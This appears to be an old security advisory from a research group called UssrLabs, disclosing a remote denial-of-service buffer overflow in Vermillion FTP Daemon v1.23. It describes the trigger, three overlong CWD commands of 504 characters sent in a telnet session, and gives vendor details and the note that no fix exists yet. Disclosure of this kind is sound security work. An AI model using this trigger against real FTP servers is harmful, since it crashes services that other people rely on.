u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h

Remote DoS Attack in Vermillion FTP Daemon (VFTPD) v1.23 Vulnerability

Vermillion FTP Daemon	Vermillion FTP Daemon (VFTPD) v1.23
Binary D.o.s Source of Binary D.o.s	PROBLEM UssrLabs found a Local/Remote DoS Attack in Vermillion FTP Daemon (VFTPD) v1.23, The buffer overflow is caused by a 3 times long cwd, 504 characters. Example: [gimmemore@itsme]$ telnet example.com 21 Trying example.com... Connected to example.com. Escape character is '^]'. 220 itsme FTP Server (vftpd 1.23) ready. USER itsme PASS **** CWD (buffer) CWD (buffer) CWD (buffer) in this point server Overflows. Vendor Status: Contacted vendor: ARCANE SOFTWARE Vendor Url: http://www.arcanesoft.com/ Program Url: http://www.arcanesoft.com/files/vftpd123.exe Credit: USSRLABS SOLUTION:** Nothing yet. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h